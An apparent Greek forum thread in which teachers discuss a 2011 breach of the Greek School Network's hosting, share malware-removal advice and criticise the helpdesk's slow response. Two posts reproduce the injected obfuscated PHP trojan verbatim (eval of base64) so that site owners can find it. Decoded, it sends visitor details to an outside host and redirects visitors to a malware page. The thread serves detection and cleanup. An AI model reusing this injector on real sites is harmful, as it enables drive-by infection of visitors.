Αποστολέας Θέμα: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ  (Αναγνώστηκε 7793 φορές)

alkisg

  • Τεχνικός / καθαρίστρια
  • *****
  • Μηνύματα: 4856
    • alkisg@im.sch.gr
    • Ο Διερμηνευτής της ΓΛΩΣΣΑΣ
Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« στις: 14 Απρ 2011, 10:17:03 μμ »
Σήμερα για κάποιες ώρες το φόρουμ είχε παραβιαστεί, πιθανώς λόγω κάποιου κενού ασφαλείας του SMF.
Το αποτέλεσμα ήταν ότι σε κάθε επίσκεψη ο χρήστης μεταφερόταν για λίγο σε κάποια άλλη σελίδα που είχε το "TrojanDownloader:Java/Exdoer", και ανάλογα με το λειτουργικό, τον browser και το αντιιικό του υπήρχε περίπτωση να κολλήσει.

Επανέφερα το φόρουμ όπως ήταν πριν την παραβίαση, αλλά δεν έχει ακόμα ανακοινωθεί κάποιο κενό ασφαλείας από την εταιρία Simple Machines που αναπτύσσει το λογισμικό SMF του φόρουμ, ούτε έχει βγει κάποια διόρθωση, επομένως δεν υπάρχει εγγύηση ότι αυτό δεν θα ξανασυμβεί.

Έτσι για τις επόμενες μέρες καλό θα είναι οι χρήστες του φόρουμ να είναι προσεκτικοί κατά την επίσκεψή τους.

poursali

  • Δεινόσαυρος
  • *****
  • Μηνύματα: 920
    • Στέφανος-Κων/νος Πουρσαλίδης
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #1 στις: 14 Απρ 2011, 10:32:11 μμ »
και από ότι είδα ανακαλύφτηκε σήμερα από την microsoft... όσοι νομίζουν ότι έχουν προσβληθεί καλύτερα να περιορίσουν τη χρήση του υπολογιστή μέχρι να έχει ενημερωθεί το αντιικό...
μετρον αριστον
είμαι τζαμπατζής, χρησιμοποιώ λίνουξ

dim

  • Δεινόσαυρος
  • *****
  • Μηνύματα: 445
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #2 στις: 14 Απρ 2011, 10:37:39 μμ »
....
καλύτερα να περιορίσουν τη χρήση του υπολογιστή
να είναι προσεκτικοί κατά την επίσκεψή τους.
Τι ακριβώς δηλαδή να κάνουμε?
Πως γίνεται το να είμαι προσεκτική κατά την επίσκεψή μου...    και πως γίνεται να περιορίσω τη χρήση...
Υπάρχει κάποιο χαπάκι....... αντιβίωση ίσως?

nikosx

  • Ομάδα διαγωνισμάτων 2010
  • *
  • Μηνύματα: 360
  • ___
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #3 στις: 14 Απρ 2011, 10:41:12 μμ »
εγώ πάντως κόλλησα πολύ πράγμα και ο desktop έχει σχεδόν πεθάνει :(
Νίκος Ξένος
nkxenos@yahoo.gr

poursali

  • Δεινόσαυρος
  • *****
  • Μηνύματα: 920
    • Στέφανος-Κων/νος Πουρσαλίδης
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #4 στις: 14 Απρ 2011, 10:50:12 μμ »
μια λύση είναι αυτή: http://www.bleepingcomputer.com/virus-removal/remove-ms-removal-tool

δεν την έχω ελέγξει μιας και έχω λινουξ

@dim: το λέω πχ για κάποιον που κάνει συναλλαγές μέσω ιντερνετ, web banking κλπ και επίσης για όσους δεν θα ήθελαν να χάσουν κάποιο σημαντικό αρχείο - κυρίως τα δεδομένα μας νοιάζουν πάντα
μετρον αριστον
είμαι τζαμπατζής, χρησιμοποιώ λίνουξ

evry

  • Γενικός διαχειριστής
  • *****
  • Μηνύματα: 3104
  • to Iterate is human to Recurse divine
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #5 στις: 14 Απρ 2011, 10:53:00 μμ »
http://www.geekpolice.net/t26522-remove-ms-removal-tool-removal-guide

το παραπάνω το δοκίμασα γιατί κόλλησε ο ένας υπολογιστής και είναι οκ.

με το linux δεν υπάρχει πρόβλημα
What I cannot create I do not understand -- Richard Feynman
http://evripides.mysch.gr

pgrontas

  • Ομάδα διαγωνισμάτων 2016
  • *
  • Μηνύματα: 1310
  • There are always possibilities...
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #6 στις: 14 Απρ 2011, 11:43:26 μμ »
και από ότι είδα ανακαλύφτηκε σήμερα από την microsoft... όσοι νομίζουν ότι έχουν προσβληθεί καλύτερα να περιορίσουν τη χρήση του υπολογιστή μέχρι να έχει ενημερωθεί το αντιικό...
Πάντως σε μένα το Microsoft Security Essentials το μπλόκαρε εξαρχής και δεν φαίνεται να έχω κολλήσει τίποτα.
A man provided with paper, pencil, and rubber, and subject to strict discipline is in effect a universal machine - Alan Turing

poursali

  • Δεινόσαυρος
  • *****
  • Μηνύματα: 920
    • Στέφανος-Κων/νος Πουρσαλίδης
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #7 στις: 14 Απρ 2011, 11:58:38 μμ »
Πάντως σε μένα το Microsoft Security Essentials το μπλόκαρε εξαρχής και δεν φαίνεται να έχω κολλήσει τίποτα.

ίσως είχε προλάβει το δικό σου να ενημερωθεί :)
μετρον αριστον
είμαι τζαμπατζής, χρησιμοποιώ λίνουξ

petrosp13

  • Ομάδα Νέου Λυκείου
  • *
  • Μηνύματα: 2199
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #8 στις: 15 Απρ 2011, 12:06:22 πμ »
Δημιούργησε χοντρό πρόβλημα αυτό που κατέβαινε από την σελίδα, αλλά το επανέφερα σε safe mode
Δεν άφηνε κανένα πρόγραμμα να ανοίξει, δεν άφηνε το CTRL+ALT+DEL, έκλεισε ακόμα και τα υπάρχοντα προγράμματα
Παπαδόπουλος Πέτρος
Καθηγητής Πληροφορικής

tom

  • Δεινόσαυρος
  • *****
  • Μηνύματα: 488
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #9 στις: 15 Απρ 2011, 12:51:29 πμ »
Εμένα το AVG Internet Security "ξηγήθηκε"  :) .
Θωμάς Σκυλογιάννης

- Ζήσε σα να' ταν να πεθάνεις αύριο. Μάθε σα να' ταν να ζεις για πάντα.
                                                                                     Μαχάτμα Γκάντι

amichail

  • Βετεράνος
  • ****
  • Μηνύματα: 98
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #10 στις: 15 Απρ 2011, 02:05:55 πμ »
Και εμένα το έπιασε το avast antivirus. Αλλά είχε όλο το sch.gr πρόβλημα, δεν έμπαινε ούτε στο webmail ούτε πουθενά. Ούτε και σε πολλές άλλες σελίδες.
Αφού για μια στιγμή σκέφτηκα μήπως ήταν false positive.
Μετά άλλαξα σε Ubuntu, έψαξα ανενόχλητη πλέον στο google και είδα ότι έχει κάνει μεγάλη ζημιά ... άρχισε κατά κύματα και ήταν πλέον σε μορφή χιονοστιβάδας.
Για μένα θα πω μόνο ότι είμαι ο τύπος του δασκάλου που αν κάνω ένα μάθημα για 50η φορά θα αλλάξω για 52η φορά τις σημειώσεις μου

geokra

  • Βετεράνος
  • ****
  • Μηνύματα: 88
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #11 στις: 15 Απρ 2011, 07:51:19 πμ »
μια λύση είναι αυτή: http://www.bleepingcomputer.com/virus-removal/remove-ms-removal-tool

δεν την έχω ελέγξει μιας και έχω λινουξ

@dim: το λέω πχ για κάποιον που κάνει συναλλαγές μέσω ιντερνετ, web banking κλπ και επίσης για όσους δεν θα ήθελαν να χάσουν κάποιο σημαντικό αρχείο - κυρίως τα δεδομένα μας νοιάζουν πάντα
Και γω το ίδιο κόλλησα, αλλά είναι και λίγο επίμονο το άτιμο, δεν βγαίνει και εύκολα.

Λάμπρος Μπουκουβάλας

  • Η παιδεία είναι: στους φτωχούς, ΠΛΟΥΤΟΣ. Στους πλούσιους, ΣΤΟΛΙΔΙ. Στους νέους, ΚΑΙ ΤΑ ΔΥΟ (Διογένης) !
  • Δεινόσαυρος
  • *****
  • Μηνύματα: 1226
    • http://users.sch.gr/lambrosbouk
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #12 στις: 15 Απρ 2011, 04:42:09 μμ »
εγώ δεν αντιμετώπισα κανένα πρόβλημα.
πρέπει να το παραδεχθείτε, έχω τον καλύτερο και ασφαλέστερο υπολογιστή του κόσμου!  ;D
Λάμπρος Μπουκουβάλας

http://lambrosbouk.wordpress.com
http://blogs.sch.gr/lambrosbouk

Ο Θουκυδίδης  που τον διαβάζουν οι ξένοι, αλλά όχι εμείς  έγραφε: «Αταλαίπωρος τοις πολλοίς η ζήτησις της αληθείας, και επί τα ετοίμα μάλλον τρέπονται» (Ι, 20, 3). Οι περισσότεροι δηλαδή αναζητούν αβασάνιστα την αλήθεια και στρέφονται σε ό,τι βρίσκουν έτοιμο. Δεν προβληματίζονται…

alkisg

  • Τεχνικός / καθαρίστρια
  • *****
  • Μηνύματα: 4856
    • alkisg@im.sch.gr
    • Ο Διερμηνευτής της ΓΛΩΣΣΑΣ
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #13 στις: 26 Απρ 2011, 10:44:13 πμ »
Χρόνια πολλά σε όλους.

Τελικά το κενό ασφαλείας δεν ήταν στο φόρουμ (SMF) αλλά κάπου πιο κεντρικά στο ΠΣΔ, είτε στον apache, είτε, χειρότερα ακόμα, με τοπική πρόσβαση στο file system του web server. Συγκεκριμένα φαίνεται να προσέβαλε μαζικά πολλούς ιστοχώρους χρηστών του ΠΣΔ, γράφοντας σε όσα αρχεία .php μπορούσε, δηλαδή σε αυτά που είχαν write access στο "others".
Ο trojan έμπαινε στην αρχή αυτών των αρχείων php, με την παρακάτω κρυπτογραφημένη μορφή:
Κώδικας: PHP
  1. <?php
  2. eval(base64_decode('Z2xvYmFsICRyZXNwb25zZV9zZXNzaW9uczsNCg0KaWYoISRyZXNwb25zZV9zZXNzaW9ucykgew0KCSRyZXNwb25zZV9zZXNzaW9ucyA9ICJhbGl2ZSI7DQoNCgkkcz1iYXNlNjRfZW5jb2RlKHN0cnJldihiYXNlNjRfZW5jb2RlKHN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnUkVNT1RFX0FERFInXSkuJ3wnLnN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnSFRUUF9BQ0NFUFQnXSkuJ3wnLnN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKSkpOw0KCSR1PSdodHRwOi8vbWRteXNzZC5jei5jYy94cC9zZXNzaW9uLnBocCc7DQoJJHM9QGZpbGVfZ2V0X2NvbnRlbnRzKCIkdT90PSRzIik7DQoNCglpZihjb3VudCgkaHR0cF9yZXNwb25zZV9oZWFkZXIpKSB7DQoJCSRyZWxvYyA9ICcnOw0KCQlmb3JlYWNoKCRodHRwX3Jlc3BvbnNlX2hlYWRlciBhcyAkdikgew0KCQkJJHQ9ZXhwbG9kZSgiOiAiLCR2KTsNCgkJCWlmKHN0cnRvbG93ZXIodHJpbSgkdFswXSkpPT0ibG9jYXRpb24iKSB7DQoJCQkJJHJlbG9jID0gdHJpbSgkdFsxXSk7DQoJCQl9DQoJCX0NCgkJaWYoJHJlbG9jICYmICFzdHJsZW4oc3RycG9zKCRyZWxvYywnMDAwMDEwMjAnKSkpIHsNCgkJCWlmKCFAaGVhZGVyc19zZW50KCkpIHsNCgkJCQlAaGVhZGVyKCJIVFRQLzEuMSAzMDIgRm91bmQiKTsNCgkJCQlAaGVhZGVyKCJWYXJ5OiBBY2NlcHQtRW5jb2RpbmcsVXNlci1BZ2VudCIpOw0KCQkJCUBoZWFkZXIoIkxvY2F0aW9uOiAkcmVsb2MiKTsNCgkJCX0gZWxzZSB7DQoJCQkJZWNobyAiPGgzPlBhZ2UgTW92ZWQ8L2gzPlRoZSBwYWdlIHlvdSBhcmUgdHJ5aW5nIHRvIG9wZW4gaGFzIGJlZW4gbW92ZWQuPGJyPjxicj5Vc2UgdGhlIG5hdmlnYXRpb24gbGlua3Mgb24gdGhlIHJpZ2h0IG9mIHRoaXMgcGFnZSwgdGhlIHNlYXJjaCBib3ggYXQgdGhlIHRvcCwgb3IgdGhlIHNpdGUgbWFwIGxpbmsgYmVsb3cgdG8gZmluZCB0aGUgbmV3IGxvY2F0aW9uIG9mIHRoZSBwYWdlIHlvdSdyZSBzZWVraW5nLjxicj48YnI+Q2xpY2sgdGhlIGxpbmsgYmVsb3cgdG8gZm9sbG93IG5ldyB1cmwuPGJyPjxicj48YSBocmVmPVwiIi4kdS4iXCI+Ii4kdS4iPC9hPiI7DQoJCQkJZWNobyAic2NyaXB0IHR5cGU9XCJ0ZXh0L2phdmFzY3JpcHRcIj5kb2N1bWVudC5sb2NhdGlvbiA9IFwiIi4kdS4iXCI7PC9zY3JpcHQ+IjsNCgkJCX0NCgkJCWV4aXQ7DQoJCX0NCgl9DQp9'));?><?php και εδώ συνεχίζει το αρχικό αρχείο...
  3.  

Αν έχετε ιστοχώρο στο ΠΣΔ με php αρχεία, αν θέλετε ρίξτε μια ματιά να δείτε αν κάποια από αυτά τροποποιήθηκαν στις 13/4, κι αν ναι, ελέξτε ότι δεν ξεκινάνε με την παραπάνω γραμμή.

Είχα αναφέρει το πρόβλημα στο helpdesk.sch.gr και τους πρότεινα να κάνουν μια κεντρική ανακοίνωση για να ενημερώσουν όλους τους εκπαιδευτικούς για το πρόβλημα, ώστε τουλάχιστον όσοι κόλλησαν να αφαιρέσουν τον ιό. Σήμερα μου απάντησαν ότι είναι ενήμεροι και έκλεισαν το σχετικό δελτίο.

new2011

  • Νέος
  • *
  • Μηνύματα: 9
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #14 στις: 28 Απρ 2011, 10:19:38 μμ »
Καλησπέρα,
Το web site του Π. Τσιωτάκη βγάζει  το εξής μήνυμα :

Προειδοποίηση- η επίσκεψη σε αυτόν τον ιστότοπο μπορεί να προκαλέσει ζημία στον υπολογιστή σας!

Τι συμβαίνει ????

alkisg

  • Τεχνικός / καθαρίστρια
  • *****
  • Μηνύματα: 4856
    • alkisg@im.sch.gr
    • Ο Διερμηνευτής της ΓΛΩΣΣΑΣ
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #15 στις: 28 Απρ 2011, 10:30:00 μμ »
Μάλλον αυτό: http://alkisg.mysch.gr/steki/index.php?topic=3846.msg40550#msg40550

Πρέπει επιτέλους να πάρουν κεντρικά μέτρα από το ΠΣΔ, έχει 15 μέρες πια η ιστορία με την παραβίαση ασφαλείας του και ούτε έλυσαν το πρόβλημα, ούτε ανακοίνωση δεν έκαναν ακόμα...

Παναγιώτης Τσιωτάκης

  • Ομάδα Νέου Λυκείου
  • *
  • Μηνύματα: 3165
  • I love you 3000
    • Panagiotis Tsiotakis
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #16 στις: 28 Απρ 2011, 11:22:09 μμ »
το βγάζει σε πολλούς ιστότοπους του ΠΣΔ, συνάδελφε
και στο στέκι κάθε φορά που το επισκέπτομαι

περιμένω τη  επαναφορά και γω...κάποια στιγμή είδα τα αρχεία αλλά όχι τη βάση δεδομένων
ίδωμεν

alkisg

  • Τεχνικός / καθαρίστρια
  • *****
  • Μηνύματα: 4856
    • alkisg@im.sch.gr
    • Ο Διερμηνευτής της ΓΛΩΣΣΑΣ
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #17 στις: 29 Απρ 2011, 12:38:47 πμ »
Παναγιώτη από το στέκι έχω αφαιρέσει μόνος μου τον trojan, ενώ στο site σου παραμένει.
Καλύτερα θα είναι να τον βγάλεις κι εσύ, γιατί από το ΠΣΔ μπορεί να αργήσουν...

Στέκι, όλα καλά:
Κώδικας: [Επιλογή]
$ wget -q http://alkisg.mysch.gr/steki/ -O -

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="stylesheet" type="text/css" href="http://alkisg.mysch.gr/steki/Themes/default/css/index.css?rc5" />
...κτλ κτλ

Site σου, μολυσμένο:
Κώδικας: [Επιλογή]
$ wget -q http://users.sch.gr/ptsiotakis/ -O -

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Security report #1186 / 2011-04-28</title>
</head>
<frameset rows="*,20">
<frame src="http://nimelts.cz(bad).cc/downloads/">
<frame src="http://nimelts.cz(bad).cc/xp/index.php?tp=3fb41d99137405e1" noresize scrolling="no">

</frameset>
</html>

Το (bad) το έβαλα επίτηδες για να μην πάει κάποιος κατά λάθος εκεί και κολλήσει.
Μπες με ftp στο site σου και δες ποιο .php αρχείο έχει αλλαχθεί στις 13/4...
Btw ο injected php κώδικας έχει κάποιον έλεγχο και κάνει redirect στο cz.cc μόνο μερικές φορές, όχι πάντα, οπότε το wget μπορεί να μην δείχνει πάντα το ανεπιθύμητο url.


Το προειδοποιητικό μήνυμα που βγάζουν οι browsers είναι άλλο θέμα, αφορά γενικά το users.sch.gr/* λόγω των συχνών εμφανίσεων του trojan σε αρκετούς χρήστες (υποφακέλους). Οπότε θα συνεχίσει να εμφανίζεται μέχρι το ΠΣΔ να καθαρίσει εντελώς και να βγει από την blacklist. Στο μεταξύ όμως καλό είναι τουλάχιστον εμείς οι Πληροφορικοί που έχουμε την τεχνογνωσία, να αφαιρέσουμε τον trojan από τις σελίδες μας, για να μην κολλάμε τους επισκέπτες...

pfan

  • Δεινόσαυρος
  • *****
  • Μηνύματα: 105
  • ...
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #18 στις: 29 Απρ 2011, 06:05:18 πμ »
Επειδή είχα πρόβλημα και στο δικό μου σχολείο καθάρισα (με τη βοήθεια του Άλκη) τις σελίδες και άνοιξα ένα δελτίο στο helpdesk.sch.gr για να αναφέρω το πρόβλημα και ότι παρατηρείται και σε άλλα σχολεία. Η απάντηση που πήρα ήταν ότι πρέπει να δηλώσω σε ποια σχολεία υπάρχει το πρόβλημα. Οπότε καλό είναι όσοι έχουν το πρόβλημα να ανοίξουν ένα δελτίο στο helpdesk.

@Άλκη μήπως το θέμα αυτό να φύγει από την ΑΕΠΠ

(Χρόνια πολλά σε όλους!!!)
Πύρζα Φανή
Μηχανικός Η/Υ Συστημάτων
Καθηγήτρια Πληροφορικής

Λάμπρος Μπουκουβάλας

  • Η παιδεία είναι: στους φτωχούς, ΠΛΟΥΤΟΣ. Στους πλούσιους, ΣΤΟΛΙΔΙ. Στους νέους, ΚΑΙ ΤΑ ΔΥΟ (Διογένης) !
  • Δεινόσαυρος
  • *****
  • Μηνύματα: 1226
    • http://users.sch.gr/lambrosbouk
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #19 στις: 29 Απρ 2011, 08:38:04 μμ »
Είχα κι εγώ πρόβλημα στο http://users.sch.gr/lambrosbouk
Έστειλα ένα τεχνικό δελτίο μέσα στη Μεγάλη Εβδομάδα και ο Θοδωρής Μπρότσης από το παν. Θεσσαλίας μου έλυσε το πρόβλημα την επόμενη μέρα.
Λάμπρος Μπουκουβάλας

http://lambrosbouk.wordpress.com
http://blogs.sch.gr/lambrosbouk

Ο Θουκυδίδης  που τον διαβάζουν οι ξένοι, αλλά όχι εμείς  έγραφε: «Αταλαίπωρος τοις πολλοίς η ζήτησις της αληθείας, και επί τα ετοίμα μάλλον τρέπονται» (Ι, 20, 3). Οι περισσότεροι δηλαδή αναζητούν αβασάνιστα την αλήθεια και στρέφονται σε ό,τι βρίσκουν έτοιμο. Δεν προβληματίζονται…

alkisg

  • Τεχνικός / καθαρίστρια
  • *****
  • Μηνύματα: 4856
    • alkisg@im.sch.gr
    • Ο Διερμηνευτής της ΓΛΩΣΣΑΣ
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #20 στις: 29 Απρ 2011, 09:10:13 μμ »
Λάμπρο μου εφόσον είχαν τρύπα ασφαλείας στο web hosting τους και γέμισε ο σκληρός τους δίσκος με τον trojan, ας κάνουν μια μαζική εύρεση και διαγραφή του κώδικά του και να τον διώξουν σε 2 λεπτά.
Δεν χρειάζεται να περιμένουν τον κάθε χρήστη του ΠΣΔ που έχει αρχεία .php να καταλάβει ότι έχει κολλήσει trojan και να το αναφέρει στο helpdesk. Η πλειονότητα των χρηστών του ΠΣΔ δεν είναι Πληροφορικοί και δεν είναι σίγουρο ότι θα καταλάβουν και θα αναφέρουν το πρόβλημα. Μάλιστα και αρκετοί Πληροφορικοί μπορεί να μην καταλάβουν ότι φταίει το site τους, ή να περιμένουν να διορθωθεί από μόνο του.

Αν δεν λάβουν κεντρικά μέτρα το καθάρισμα θα διαρκέσει μήνες, και στο μεταξύ το users.sch.gr ήδη έχει μπει σε blacklist και μας επηρεάζει όλους.

Προσωπικά όμως σημαντικότερο λάθος τους θεωρώ το ότι δεν βγήκαν να παραδεχτούν την παραβίαση ασφαλείας, και να ειδοποιήσουν τους χρήστες ότι όλα τα δεδομένα τους μπορεί να έχουν πέσει σε ξένα χέρια. Κάποιος ξένος είχε πρόσβαση σε όλο το file system του server. Είναι σοβαρά πράγματα αυτά, θα έπρεπε να είχαν λυθεί από την πρώτη μέρα, όχι να συζητάμε για τα αυτονόητα 15 μέρες μετά.

Παναγιώτης Τσιωτάκης

  • Ομάδα Νέου Λυκείου
  • *
  • Μηνύματα: 3165
  • I love you 3000
    • Panagiotis Tsiotakis
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #21 στις: 29 Απρ 2011, 09:35:48 μμ »
στατική html και το κεφάλι μας ήσυχο

Λάμπρος Μπουκουβάλας

  • Η παιδεία είναι: στους φτωχούς, ΠΛΟΥΤΟΣ. Στους πλούσιους, ΣΤΟΛΙΔΙ. Στους νέους, ΚΑΙ ΤΑ ΔΥΟ (Διογένης) !
  • Δεινόσαυρος
  • *****
  • Μηνύματα: 1226
    • http://users.sch.gr/lambrosbouk
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #22 στις: 30 Απρ 2011, 03:25:45 μμ »
Άλκη, συμφωνώ με όσα γράφεις.

Μου ήρθε το παρακάτω mail στις 22/4:

Λάμπρος Μπουκουβάλας

http://lambrosbouk.wordpress.com
http://blogs.sch.gr/lambrosbouk

Ο Θουκυδίδης  που τον διαβάζουν οι ξένοι, αλλά όχι εμείς  έγραφε: «Αταλαίπωρος τοις πολλοίς η ζήτησις της αληθείας, και επί τα ετοίμα μάλλον τρέπονται» (Ι, 20, 3). Οι περισσότεροι δηλαδή αναζητούν αβασάνιστα την αλήθεια και στρέφονται σε ό,τι βρίσκουν έτοιμο. Δεν προβληματίζονται…

pmouz

  • Θαμώνας
  • ***
  • Μηνύματα: 33
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #23 στις: 01 Μάι 2011, 12:21:12 μμ »
Χρόνια πολλά σε όλους.

Τελικά το κενό ασφαλείας δεν ήταν στο φόρουμ (SMF) αλλά κάπου πιο κεντρικά στο ΠΣΔ, είτε στον apache, είτε, χειρότερα ακόμα, με τοπική πρόσβαση στο file system του web server. Συγκεκριμένα φαίνεται να προσέβαλε μαζικά πολλούς ιστοχώρους χρηστών του ΠΣΔ, γράφοντας σε όσα αρχεία .php μπορούσε, δηλαδή σε αυτά που είχαν write access στο "others".
Ο trojan έμπαινε στην αρχή αυτών των αρχείων php, με την παρακάτω κρυπτογραφημένη μορφή:
Κώδικας: PHP
  1. <?php
  2. eval(base64_decode('Z2xvYmFsICRyZXNwb25zZV9zZXNzaW9uczsNCg0KaWYoISRyZXNwb25zZV9zZXNzaW9ucykgew0KCSRyZXNwb25zZV9zZXNzaW9ucyA9ICJhbGl2ZSI7DQoNCgkkcz1iYXNlNjRfZW5jb2RlKHN0cnJldihiYXNlNjRfZW5jb2RlKHN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnUkVNT1RFX0FERFInXSkuJ3wnLnN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnSFRUUF9BQ0NFUFQnXSkuJ3wnLnN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKSkpOw0KCSR1PSdodHRwOi8vbWRteXNzZC5jei5jYy94cC9zZXNzaW9uLnBocCc7DQoJJHM9QGZpbGVfZ2V0X2NvbnRlbnRzKCIkdT90PSRzIik7DQoNCglpZihjb3VudCgkaHR0cF9yZXNwb25zZV9oZWFkZXIpKSB7DQoJCSRyZWxvYyA9ICcnOw0KCQlmb3JlYWNoKCRodHRwX3Jlc3BvbnNlX2hlYWRlciBhcyAkdikgew0KCQkJJHQ9ZXhwbG9kZSgiOiAiLCR2KTsNCgkJCWlmKHN0cnRvbG93ZXIodHJpbSgkdFswXSkpPT0ibG9jYXRpb24iKSB7DQoJCQkJJHJlbG9jID0gdHJpbSgkdFsxXSk7DQoJCQl9DQoJCX0NCgkJaWYoJHJlbG9jICYmICFzdHJsZW4oc3RycG9zKCRyZWxvYywnMDAwMDEwMjAnKSkpIHsNCgkJCWlmKCFAaGVhZGVyc19zZW50KCkpIHsNCgkJCQlAaGVhZGVyKCJIVFRQLzEuMSAzMDIgRm91bmQiKTsNCgkJCQlAaGVhZGVyKCJWYXJ5OiBBY2NlcHQtRW5jb2RpbmcsVXNlci1BZ2VudCIpOw0KCQkJCUBoZWFkZXIoIkxvY2F0aW9uOiAkcmVsb2MiKTsNCgkJCX0gZWxzZSB7DQoJCQkJZWNobyAiPGgzPlBhZ2UgTW92ZWQ8L2gzPlRoZSBwYWdlIHlvdSBhcmUgdHJ5aW5nIHRvIG9wZW4gaGFzIGJlZW4gbW92ZWQuPGJyPjxicj5Vc2UgdGhlIG5hdmlnYXRpb24gbGlua3Mgb24gdGhlIHJpZ2h0IG9mIHRoaXMgcGFnZSwgdGhlIHNlYXJjaCBib3ggYXQgdGhlIHRvcCwgb3IgdGhlIHNpdGUgbWFwIGxpbmsgYmVsb3cgdG8gZmluZCB0aGUgbmV3IGxvY2F0aW9uIG9mIHRoZSBwYWdlIHlvdSdyZSBzZWVraW5nLjxicj48YnI+Q2xpY2sgdGhlIGxpbmsgYmVsb3cgdG8gZm9sbG93IG5ldyB1cmwuPGJyPjxicj48YSBocmVmPVwiIi4kdS4iXCI+Ii4kdS4iPC9hPiI7DQoJCQkJZWNobyAic2NyaXB0IHR5cGU9XCJ0ZXh0L2phdmFzY3JpcHRcIj5kb2N1bWVudC5sb2NhdGlvbiA9IFwiIi4kdS4iXCI7PC9zY3JpcHQ+IjsNCgkJCX0NCgkJCWV4aXQ7DQoJCX0NCgl9DQp9'));?><?php και εδώ συνεχίζει το αρχικό αρχείο...
  3.  

Αν έχετε ιστοχώρο στο ΠΣΔ με php αρχεία, αν θέλετε ρίξτε μια ματιά να δείτε αν κάποια από αυτά τροποποιήθηκαν στις 13/4, κι αν ναι, ελέξτε ότι δεν ξεκινάνε με την παραπάνω γραμμή.

Είχα αναφέρει το πρόβλημα στο helpdesk.sch.gr και τους πρότεινα να κάνουν μια κεντρική ανακοίνωση για να ενημερώσουν όλους τους εκπαιδευτικούς για το πρόβλημα, ώστε τουλάχιστον όσοι κόλλησαν να αφαιρέσουν τον ιό. Σήμερα μου απάντησαν ότι είναι ενήμεροι και έκλεισαν το σχετικό δελτίο.

Και στην προσωπική μου ιστοσελίδα στο sch  είχε πάει στο configuration.php και είχε βάλει το eval(...) στην αρχή του αρχείου με αποτέλεσμα να φορτώνει κάποια άλλη ιστοσελίδα. Όποιος το έκανε να του καεί ο υπολογιστής...

Keep Growing

  • Ομάδα διαγωνισμάτων 2011
  • *
  • Μηνύματα: 2023
  • Παναγιώτης Πέντσας Γυμνάσιο Σορωνής
    • Περισσότερες πληροφορίες για μένα
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #24 στις: 02 Μάι 2011, 05:00:09 μμ »
"...maintenance downtime or capacity problems", με την υπομονή και τα νεύρα μας.

Γιατί δε λένε: "joomla και wordpress (php γενικά) απαγορεύονται στο ΠΣΔ", ώστε και μεις να βρούμε την υγειά μας αλλά και το "ψηφιακό σχολείο" να χτιστεί από primitive programmers.  :-\
Ο Έρωτας (του Εκπ/κου Πληροφορικού) στ' αλώνια της καλδέρας (του υπνωτισμού).

amichail

  • Βετεράνος
  • ****
  • Μηνύματα: 98
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #25 στις: 04 Μάι 2011, 01:32:36 πμ »
Λυπάμαι που το λέω, αλλά τόσες μέρες μετά τον ιό, εξακολουθεί να μου βγάζει προειδοποίηση για ορισμένα θέματα στο ΣΤΕΚΙ.
Κοινό χαρακτηριστικό τους έχουν ότι σε όλα περιλαμβάνεται ανάρτηση του κου Τσιωτάκη.
Απ΄όσο μπορώ να δω, σε όσα δεν έχει καταθέσει ακόμα την (πολύτιμη) άποψη του δεν μου βγάζει προειδοποίηση.
Παίζει κάτι με το προφίλ π.χ.; έχει σύνδεση με το site που ειρήσθω εν παρόδω δυστυχώς βγάζει ακόμα και αυτό το ίδιο μήνυμα;
ρωτάω εγώ η άσχετη  ???

το μήνυμα εν τω μεταξύ λέει γενικά για το users.sch.gr

